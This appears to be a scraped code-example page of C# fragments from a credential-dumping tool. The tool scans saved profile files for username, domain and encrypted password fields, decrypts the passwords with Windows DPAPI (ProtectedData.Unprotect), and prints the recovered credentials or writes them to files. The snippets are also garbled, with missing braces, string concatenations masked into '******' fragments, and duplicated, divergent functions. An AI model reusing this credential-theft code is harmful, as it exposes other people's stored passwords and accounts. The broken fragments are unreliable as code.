// Prints the creds stored in the UsernameStore structure
 public static void PrintUsernameStore(UsernameStore theStore)
     Console.WriteLine("Found the following:");
     Console.WriteLine("Domain: " + theStore.domain);
     Console.WriteLine("Username: "******"Password: " + theStore.password);
        // Try to decrpyt the password, and extract username + domain
        public void Stage3()
            string[] profiles;

                profiles = Directory.GetFiles(this._workingDirectory);
                // Failure
                Console.WriteLine("Didnt find any profiles :/");

            // Loop over all the profiles in the profile directory we created in the previous steps
            foreach (string profilePath in profiles)
                string profile = Path.GetFileNameWithoutExtension(profilePath);

                // Is this a stage2 decrypted payload?
                if (!profile.Contains(stage2Prefix))
                profile = profile.Replace(stage2Prefix, "");

                    // Try to decrypt everything, and print what we found
                    byte[]        data     = File.ReadAllBytes(profilePath);
                    UsernameStore theStore = DecryptAll(data);

                    // If we decrypted the password, store the result into a file
                    if (theStore.password != null && theStore.password.Length > 0)
                        // Generate the payload
                        var sb = new StringBuilder();
                        sb.AppendLine("Domain: " + theStore.domain);
                        sb.AppendLine("Username: "******"Password: "******"/" + stage3Prefix + profile + extension, sb.ToString());
                    // Failed to read, continued
                    Console.WriteLine("Failed to read " + profile);
예제 #3
        // Try to decrpyt the password, and extract username + domain
        public static void Stage3()
            string[] profiles;

                profiles = System.IO.Directory.GetFiles(workingDirectory);
                // Failure
                Console.WriteLine("Didnt find any profiles :/");

            // Loop over all the profiles in the profile directory we created in the previous steps
            for (int i = 0; i < profiles.Length; ++i)
                string profilePath = profiles[i];
                string profile     = System.IO.Path.GetFileNameWithoutExtension(profilePath);

                // Is this a stage2 decrypted payload?
                if (!profile.Contains(stage2Prefix))
                profile = profile.Replace(stage2Prefix, "");

                    // Try to decrypt everything, and print what we found
                    byte[]        data     = System.IO.File.ReadAllBytes(profilePath);
                    UsernameStore theStore = DecryptAll(data);

                    // If we decrypted the password, store the result into a file
                    if (theStore.password != null && theStore.password.Length > 0)
                        // Generate the payload
                        string theOutput = profile + "\n";
                        theOutput += "Domain: " + theStore.domain + "\n";
                        theOutput += "Username: "******"\n";
                        theOutput += "Password: "******"\n";

                        System.IO.File.WriteAllText(workingDirectory + "/" + stage3Prefix + profile + extension, theOutput);
                    // Failed to read, continued
                    Console.WriteLine("Failed to read " + profile);
예제 #4
        // Attempt to decrypt the password field in the given payload, will store the password into the given UsernameStore, or create a new one
        public static UsernameStore DecryptPassword(byte[] toDecrypt, UsernameStore theStore = null)
            if (theStore == null)
                theStore = new UsernameStore();

            // This is the signature of where the encrypted password starts
            byte[] searchForPassword = { 0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01 };

            // See if there is an encrypted password chunk present
            int passwordFieldStart = SigScan(toDecrypt, searchForPassword);

            if (passwordFieldStart != -1)
                // A chunk was successfully found
                Console.WriteLine("Found encrypted password blob...");
                byte[] passwordBlob = Slice(toDecrypt, passwordFieldStart);

                    // Try to decrypt the chunk
                    byte[] unprotectedPassword = ProtectedData.Unprotect(passwordBlob, null, DataProtectionScope.LocalMachine);

                    // Strip any null bytes that were added
                    for (int i = 0; i < unprotectedPassword.Length; ++i)
                        if (unprotectedPassword[i] == 0x00)
                            unprotectedPassword = Slice(unprotectedPassword, 0, i);

                    // Store the password
                    theStore.password = Encoding.ASCII.GetString(unprotectedPassword);
                catch (Exception e)
                    Console.WriteLine("Failed to decrypt password --- This needs to be run as the user who owns the password");
                    // failure
                // Ok, we failed to find an encrypted blob, maybe it's not encrypted?
                //searchForPassword = { 0x03, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01 };

                Console.WriteLine("Failed to find an encrypted password blob :/");

예제 #5
        // Attempts to retreive the username and domain from the given payload
        public static UsernameStore DecryptUsername(byte[] toDecrypt, UsernameStore theStore = null)
            // Used to find the start of the username / password blob
            byte[] searchForUsername = { 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 };
            byte[] nullArray         = { 0x00 };

            // Ensure we have a store for the username
            if (theStore == null)
                theStore = new UsernameStore();

            int usernameFieldStart = SigScan(toDecrypt, searchForUsername);

            if (usernameFieldStart != -1)
                // Move to the start of the actual field
                usernameFieldStart += searchForUsername.Length;
                int usernameFieldEnd = SigScan(toDecrypt, nullArray, usernameFieldStart);

                if (usernameFieldEnd != -1)
                    byte[] usernameField = Slice(toDecrypt, usernameFieldStart, usernameFieldEnd);
                    theStore.username = Encoding.ASCII.GetString(usernameField);

                    // Find the domain start
                    int domainFieldStart = SigScan(toDecrypt, nullArray, usernameFieldEnd + 1, true);

                    // Test if a domain was found, if we reached 0xE6, there was no domain present
                    if (domainFieldStart != -1 && toDecrypt[domainFieldStart] != 0xE6)
                        int domainFieldEnd = SigScan(toDecrypt, nullArray, domainFieldStart);

                        if (domainFieldEnd != -1)
                            // Copy the domain out
                            byte[] possibleDomainField = Slice(toDecrypt, domainFieldStart, domainFieldEnd);
                            theStore.domain = Encoding.ASCII.GetString(possibleDomainField);
                Console.WriteLine("Failed to find username field!");

        // Tries to decrypt the given payload, and stores the result into the UsernameStore provided, or creates a new UsernameStore
        public static UsernameStore DecryptAll(byte[] toDecrypt, UsernameStore theStore = null)
            // Ensure we have a store
            if (theStore == null)
                theStore = new UsernameStore();

            // Try to decrypt everything
            DecryptUsername(toDecrypt, theStore);
            DecryptPassword(toDecrypt, theStore);

            // Return it
        // Attempts to retreive the username and domain from the given payload
        public static UsernameStore DecryptUsername(byte[] toDecrypt, UsernameStore theStore = null)
            // Used to find the start of the username / password blob
            byte[] searchForUsername  = { 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 };
            byte[] searchForUsername2 = { 0x03, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00 };
            byte[] nullArray          = { 0x00 };

            // Ensure we have a store for the username
            if (theStore == null)
                theStore = new UsernameStore();

            int usernameFieldStart = SigScan(toDecrypt, searchForUsername);

            if (usernameFieldStart != -1)
                // Move to the start of the actual field
                usernameFieldStart += searchForUsername.Length;
                int usernameFieldEnd = SigScan(toDecrypt, nullArray, usernameFieldStart);

                if (usernameFieldEnd != -1)
                    byte[] usernameField = Slice(toDecrypt, usernameFieldStart, usernameFieldEnd);
                    theStore.username = Encoding.ASCII.GetString(usernameField);

                    // Find the domain start
                    int domainFieldStart = SigScan(toDecrypt, nullArray, usernameFieldEnd + 1, true);

                    // Test if a domain was found, if we reached 0xE6, there was no domain present
                    if (domainFieldStart != -1 && toDecrypt[domainFieldStart] != 0xE6)
                        int domainFieldEnd = SigScan(toDecrypt, nullArray, domainFieldStart);

                        if (domainFieldEnd != -1)
                            // Copy the domain out
                            byte[] possibleDomainField = Slice(toDecrypt, domainFieldStart, domainFieldEnd);
                            theStore.domain = Encoding.ASCII.GetString(possibleDomainField);
                // Failed to find the blob, maybe it's not encrypted?

                usernameFieldStart = SigScan(toDecrypt, searchForUsername2);


                if (usernameFieldStart != -1)
                    // Looks good?

                    // There will be some null bytes, skip until the end of those
                    usernameFieldStart += searchForUsername2.Length;
                    usernameFieldStart  = SigScan(toDecrypt, nullArray, usernameFieldStart, true);

                    // Find where the username field ends
                    int usernameFieldEnd = SigScan(toDecrypt, nullArray, usernameFieldStart + 1);

                    byte[] usernameField = Slice(toDecrypt, usernameFieldStart, usernameFieldEnd);
                    theStore.username = Encoding.ASCII.GetString(usernameField);

                    // Keep searching, the password is probably here too!
                    int passowrdFieldStart = SigScan(toDecrypt, nullArray, usernameFieldEnd + 1, true);

                    if (passowrdFieldStart != -1)
                        int passwordFieldEnd = SigScan(toDecrypt, nullArray, passowrdFieldStart + 1);

                        if (passwordFieldEnd != -1)
                            byte[] passwordField = Slice(toDecrypt, passowrdFieldStart, passwordFieldEnd);
                            theStore.password = Encoding.ASCII.GetString(passwordField);

                            // Maybe there is a domain too?
                            int domainFieldStart = SigScan(toDecrypt, nullArray, passwordFieldEnd + 1, true);

                            if (domainFieldStart != -1)
                                int domainFieldEnd = SigScan(toDecrypt, nullArray, domainFieldStart + 1);

                                if (domainFieldEnd != -1)
                                    byte[] domainField = Slice(toDecrypt, domainFieldStart, domainFieldEnd);

                                    if (domainField[0] != 0x01)
                                        theStore.domain = Encoding.ASCII.GetString(domainField);
                    Console.WriteLine("Failed to find username field!");
